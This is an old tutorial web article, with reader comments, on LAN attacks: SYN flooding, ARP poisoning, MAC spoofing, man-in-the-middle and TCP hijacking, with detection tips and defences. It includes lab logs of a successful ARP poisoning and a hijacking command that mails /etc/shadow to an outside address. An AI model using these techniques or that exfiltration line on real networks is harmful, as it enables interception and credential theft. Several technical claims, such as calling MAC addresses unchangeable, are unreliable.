THREATS ON THE LAN



Authors:
Amitesh Singh([email protected], http://amitesh.cjb.net)
Mohit Bhatnagar([email protected])
B.Tech(Indian School of Mines, INDIA)

Communication on LAN basically takes place through protocols like tcp/ip, udp/ip, arp, icmp etc and the most popular of these protocol is tcp/ip.

 

TCP(Transmission Control Protocol)

      

Data send on the network is in form of packets which contain information about source, target and data to be sent. TCP is a protocol developed to make sure that packets are not lost on the network as routers sent them from computer to computer. TCP splits a packet into little pieces, each piece is called a datagram.

A typical datagram looks like this :-


 



     ETHERNET HEADER
IP HEADER
TCP HEADER
DATA

Destination MAC, Source MAC
Dest IP, port and Source IP, port

SYN,ACK,PSH,RST      
 

The address of network card is called the MAC address. MAC address is a globally unique and unchangeable address which is stored on the network card itself. 

TCP HEADER FLAGS (that we care about)

 

  • SYN used in initial connection setup
  • ACK used to acknowledge received data, makes tcp reliable.
  • PSH set when there is data in the packet to pushed up to the application.
  • RST signals something horribly wrong (like a closed port), other side must stop sending data.

HOW TCP CONNECTION IS ESTABLISHED

 

Sending a packet with SYN flag means its sender wants to establish a three way TCP/IP connection with the destination system. Lets understand this in a better way

If you are A and the other one is B. You want a connection with B.

A----------------------SYN----------------------B

B-------------------SYN/ACK------------------A

A---------------------ACK-----------------------B

Now the TCP connection is established.

SYN FLOODING

 

SYN Flooding is an attack in which large no. of SYN packets are sent to the target (victim) by an attacker with a fake IP address such that all the memory of the target gets hogged up in trying to establish a connection with the fake IP address which does not exist in the network.

Effects 

 

As a result of SYN flooding all the services running on the attacked ports of the target computer are affected .The computer gets busy in sending SYN/ACK packets and is unable to provide service to legitimate users or clients. If an enormously large amount of SYN packets are sent, the target may get hanged or rebooted.

How the attack is done:

 

Windows is vulnerable to SYN-flood attack

Here is the state of 169.254.0.18 when we flooded it from my computer (169.254.0.20) by fake IP address(169.254.1.21) to the ports 25 and 139.The fake address must have your network ID (as here is it 169.254) and it should be non-existing. You can check its existence by pinging it).

C:\netstat

Active Connections

Proto Local Address Foreign Address State

  TCP    169.254.0.18:25      169.254.0.21:21       SYN_RECEIVED

  TCP    169.254.0.18:139     169.254.0.21:139      SYN_RECEIVED

How to detect SYN Attack

 

When the Attacker system sends  SYN packet to the client, the client replies by sending SYN/ACK packet and it is waiting to receive an ACK, then the existing connection is said to be in the Half-open connection or client is said to be in the state of SYN_RECIEVED. It is the state, that one can use to detect whether his system is under SYN-floods or not. 

Arp a: another way to detect SYN attack

In previous attack, the ARP cache of 169.254.0.18 is

Interface: 169.254.0.18 on Interface 0x1000003

Internet Address Physical Address Type

  169.254.0.21 00-00-00-00-00-00 invalid

169.254.74.30 00-0c-6e-f1-9e-a3 dynamic

 

As shown in the highlighted case, if the connection type is invalid and the MAC address is as shown above, it can be deduced that you are under SYN-floods.

SPOOFING

Spoofing is a technique to disguise yourself as somebody else which may or may not exist in the network depending upon your choice. It forms the basics of attacking on the network. There are many types of spoofing like

  • IP Spoofing
  • ARP Spoofing
  • DNS Spoofing

In this paper I shall be discussing only ARP spoofing.

       

ARP SPOOFING

Any computer connected to the switched network (LAN) has two addresses.

  • MAC Address
  • IP Address

 

MAC Address is the network card address and it is fixed. It is essential so that the Ethernet protocol (can be TCP/IP,UDP,FTP etc) can send data back and froth, independent of whatever application protocols are used on top of it. Ethernet builds frames of data and each frame has an Ethernet header, containing the MAC address of the source and the destination computer.

IP address is a virtual address of the computer on the network.

HOW LAN WORKS

 

When an Ethernet frame is constructed, it must be built from an IP packet. At the time of construction, Ethernet has no idea what is the MAC Address of the destination machine which it needs to create an Ethernet header. The only information it has available is the destination IP from the packets header. There must be a way for the Ethernet protocol to find the MAC Address of the destination machine, given a destination IP.

 

This is where ARP (Address Resolution Protocol) comes into play.

 

Fig 1

Let us suppose A (169.254.0.1) wants to connect to C (169.254.0.3) then A will generate an ARP request packet and broadcast it to all the users on the network inquiring Is your IP address 169.254.0.3, if so then send your MAC address to me.

 

Since the ARP request is sent in a broadcast frame, every Ethernet interface on the network reads it in and hands the ARP request to the networking software running on the

system. Only C with IP address 169.254.0.3 will respond, by sending a packet containing the MAC address of C back to the requesting system. Now A has a MAC address to which it can send data destined for C, and the high-level protocol communication can proceed.

To minimize the number of ARP requests being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association.

 

IF you want to know the MAC Address of the remote host, just type

C:/>nbtstat  -A   169.254.24.60  OR  nbtstat  a  chetan

Local Area Connection:

Node IPAddress: [169.254.0.20] Scope Id: []

  NetBIOS Remote Machine Name Table

Name Type Status

 

      ---------------------------------------------

CHETAN <00> UNIQUE Registered

CHETAN <20> UNIQUE Registered

MSHOME <00> GROUP Registered

MSHOME <1E> GROUP Registered

CHETAN <01> UNIQUE Registered

CHETAN <03> UNIQUE Registered

C_VERMA <03> UNIQUE Registered

   MAC Address = 00-0C-6E-94-0A-BF

 

HOW A SWITCH WORKS

 

Frame extracts information about destination IP from IP header of the packet. Frame has no idea about the destination MAC Address because there should be a physical link layer between these two systems.

Switch maintains a table which matches switch port numbers to corresponding MAC Addresses. Table is created when switch is powered on by the transferring of first frame through switch port and source MAC Addresses.

Port

MAC

1

 

2

 

3

 


 

This is the situation when no ARP request/reply or data transfer has taken place. Suppose H wants to connect to T1(refer Fig 3), an ARP request is broadcast over the LAN to all current users enquiring Is your IP X1, if so send me back your MAC Address. When this is passed through the switch the entry of Hs MAC Address is made in switchs cache. Now the table will look like

 

 

Port

MAC

1

 

2

 

3

M3


 

Obviously T1 responds with an ARP reply which is unicast to H which contains its own MAC Address. Moreover ARP cache of T1 will now make an entry of Hs IP address and MAC Address. Hence it sends ARP reply directly to H. As this reply will pass through the switch and port 1 down the cable, the cache of the switch will be updated to.

 

Port

MAC

1

M1

2

 

3

M3


 

When ARP reply reaches the switch then the switch decides which port to send the frame to, comparing it with the destination address of the frame to an internet table which maps the port numbers to MAC Address. Now the frame will send down the cable through the port 3.

 

HERE IS THE BUG

      As ARP is a stateless protocol, most operating systems will update their cache if a reply is received, regardless of whether they have sent an actual request.

We can exploit this bug.

 

ARP POISIONING

 

To view your cache you can type arp a in the command prompt in Windows(& of course in Linux too).

C:/>arp  a

Interface: 169.254.0.1 on Interface 0x1000003

Internet Address Physical Address Type

  169.254.0.3          00-50-ba-8e-ff-e8     dynamic  

  169.254.32.218       00-0b-2b-0d-fb-69     dynamic  

  169.254.105.118      00-50-fc-b0-f3-50     dynamic

  • 169.254.0.1your IP address
  • 0x1000003the code for your interface(in that case eth0)
  • 169.254.0.3the IP address of the remote device you are connected
  • 00-50-ba-8e-ff-e8the MAC address of that machine
  • dynamicthe link type

 

 

 

Let's observe the communication between my machine and 169.254.0.3.I got in my arp table its IP and MAC, it has in its arp table my IP and MAC. These values are updated once at 30 secs. If a malicious user sends me a spoofed packet which maps 169.254.0.3 with a non-existent MAC, I wont be able to communicate with 169.254.0.3 for at least 30 seconds!!. Enough for an attacker to hijack my session. This is called ARP Poisoning.

Now my ARP cache will look like

C:/>arp a

 

Interface: 169.254.0.1 on Interface 0x1000003

Internet Address Physical Address Type

  169.254.0.3          00-50-ba-4e-ff-e3     invalid

  169.254.32.218       00-0b-2b-0d-fb-69     dynamic  

  169.254.105.118      00-50-fc-b0-f3-50     dynamic

  

ATTACKS

 

MAC SPOOFING

 

Obtaining MAC Address of another system without sending your real MAC Address or without entering your real MAC Address in another system ARP cache is MAC Spoofing.

 

 

 

Fig 2

 

AIMH aims to know MAC of A without revealing his real MAC.

 

H broadcasts an ARP request over the network destined to reach A with a fake MAC Address Mf. Now there will be entry of Mf in the cache of switch corresponding to the port of H i.e. 2.Now A will send an ARP reply containing his real MAC address to H. When this frame reaches the switch the fake MAC address will be mapped to the port of H i.e. 2 and hence it is delivered to H. Now since the Ethernet card of H is in promiscuous mode, where it is allowed to examine frames that are destined for MAC address other than own, there will be entry of As real MAC address in Hs ARP cache.

In Linux, promiscuous mode can be enabled

# ifconfig eth0 promisc

and to disable it

# ifconfig eth0 -promisc

MAN IN MIDDLE ATTACK

 

Fig 3

 

Here H will try to insert itself between communication path of T1 and T2. H will forward frames between target computers so that communication is not interrupted.

H poisons ARP cache of T1 and T2 in this way

H sends a spoofed ARP reply to T1 containing T2s IP with Hs MAC.

Also at the same time he sends a spoofed ARP reply to T2 containing T1 IP with Hs MAC.

Now all T1 and T2 IP traffic will then go to H first instead of directly to each other.

How this attack performs

 As T1 & T2 are communicating with each other, T1s ARP cache contains T2 IP and MAC address and vice versa. H will poison the cache of T1 & T2. It sends a spoofed ARP reply to T1 containing T2s IP and Hs MAC and to T2, sends T1s IP and Hs MAC. Now in cache of T1, the IP address of T2 will be associated with the MAC address of H. When T1 want to send a packet it first splits into frames. The frame takes the destination IP from IP header of packet to be sent. It will take the MAC address from the cache. This frame having the IP address of T2 and MAC address of H will be sent to the switch by cable. Now the MAC address of frame will be mapped to the switchs port number in table i.e. cache of switch and as this port no. is 3 so frame will be sent to H. The same thing will happen in case of T2.Now H will forward the data coming from T1 to T2 and T2 to T1,so that connection between T1 & T2 will not interrupted without any trace.

 

SOLUTION

 

To avoid this type of attack T1 should have static entry of T2s IP and MAC and T2 should have static entry of T1s IP and MAC in their respective caches.

T1 will make  a static entry of T2 in this way

C:/>arp s X2 M2

EXPERIMENT

We performed this attack on LAN successfully:

 

Comp.

Name

IP Address

OS

MAC

H

Hacker

169.254.0.1

             Fedora Core(2.4.221.2115.nptl)

00:0c:f1:6b:78:4f

T1

Target 1

169.254.0.2

Windows 2000(Version 5.00.2195)

00:02:44:57: 7c:45

T2

Target 2

169.254.0.3

Windows XP(Version

5.1.2600)

00:50:ba:8f:00:0a


 

 

H sends spoofed ARP reply to T1 & T2.The ARP cache of T1 and T2 when they were spoofed:

T1:

Interface: 169.254.0.2 --- 0x2

Internet Address Physical Address Type

  169.254.0.3 00-0c-f1-6b-78-4f dynamic

 

        We can see that in the cache of T1, IP address of T2 corresponds to Hs MAC.

T2:

Interface: 169.254.0.3 on Interface 0x2

Internet Address Physical Address Type

169.254.0.2 00-0c-f1-6b-78-4f dynamic

 

On hackers system, the receiving packets are:

23:42:02.474661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:04.084663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:04.484652 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:06.094662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:06.494660 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:08.104664 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:08.504663 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:10.114661 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

         When 169.254.0.2 was trying to connect to 169.254.0.3 at the port 25, then the packet was passing through 169.254.0.1 as shown below and hence it proves that 169.254.0.1 is now in between T1 and T2.

 

23:42:46.294660 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:42:46.694653 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:42:46.705306 169.254.0.2.1163>169.254.0.3.smtp: S 398263844:398263844(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)

        Also when 169.254.0.3 tried to troubleshoot 169.254.0.2 using ping command, the datagram again passed through 169.254.0.1 as shown below.

 

23:43:27.254104 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]

23:43:28.504663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:28.904661 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:43:30.266360 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]

23:43:30.514657 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:30.914662 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:43:32.524663 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:32.924654 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

23:43:33.270757 169.254.0.3 > 169.254.0.2: icmp: echo request [ttl 1]

23:43:34.534662 arp reply 169.254.0.2 is-at 0:c:f1:6b:78:4f

23:43:34.935399 arp reply 169.254.0.3 is-at 0:c:f1:6b:78:4f

CHANGING MAC ADDRESS

As I mentioned above that MAC address cant change but Linux users can change their MAC address without spoofing software, using a single parameter ifconfig. We can exploit this

# ifconfig eth0 hw ether 00:0c:ff:4f:e8

 

In Windows2000/XP you can do it by using some softwares like SMAC etc.

 

This can be exploited as follows: H DOS attacks on T2 (refer Fig. 3), then assign himself IP and MAC of T2 receiving all frames from T1 intended for T2.

TCP/IP HIJACKING

 

Fig 4

 

 

Let us suppose A has connected to server B as a root administrator using a TELNET or FTP service. A hacker H who is able to sniff around, will do ARP poisoning A and reset his settings to that of A  and then will be able to issue commands in place of A like mail [email protected]</etc/shadow, its enough. The hacker must DOS A with either SYN flooding or ARP poisoning so that A will not be able to interfere in his attack by storming ARP requests.

SOLUTION

 

Instead of making a telnet login A can SSH (Secured Shell) or SFTP login to avoid TCP/IP hijacking.

Authors:


Amitesh Singh([email protected], http://amitesh.cjb.net)
Mohit Bhatnagar([email protected])
B.Tech(Indian School of Mines, INDIA)

Got something to add? Send me email.



3 comments



Increase ad revenue 50-250% with Ezoic


More Articles by © Amitesh Singh



Good article!

it sucks
u r an*\*****...........

---December 10, 2004

That's pretty stupid.

If you can write a better article, we're happy to publish it. If you want to add specific comments to make this better, we'll publish those too. But your stupid comment doesn't help anyone, does it?

--TonyLawrence


---December 10, 2004

Hi,
I found your artical very interesting and easy reading except for the fact that I could'nt see any images that are referred to in the artical. Could you please ensure that the images are available. Ta.

-- Ajay Kamath

---December 21, 2004







Wed Apr 13 10:36:16 2005: 337   anonymous


good articles..easy to understand the content.simple language.nice!! i like it.it helps me a lot.



Wed Apr 13 10:36:17 2005: 338   anonymous


good articles..easy to understand the content.simple language.nice!! i like it.it helps me a lot.



Sat Oct 15 07:48:52 2005: 1206   rajasekhar


ur article was very informative about the practical view of a network transmission,

------------------------
Kerio Connect Mailserver

Kerio Samepage

Kerio Control Firewall

Have you tried Searching this site?

Unix/Linux/Mac OS X support by phone, email or on-site: Support Rates

This is a Unix/Linux resource website. It contains technical articles about Unix, Linux and general computing related subjects, opinion, news, help files, how-to's, tutorials and more.

Contact us





640K ought to be enough for anybody. (Bill Gates)

It's more fun to be a pirate than to join the navy. (Steve Jobs)








This post tagged: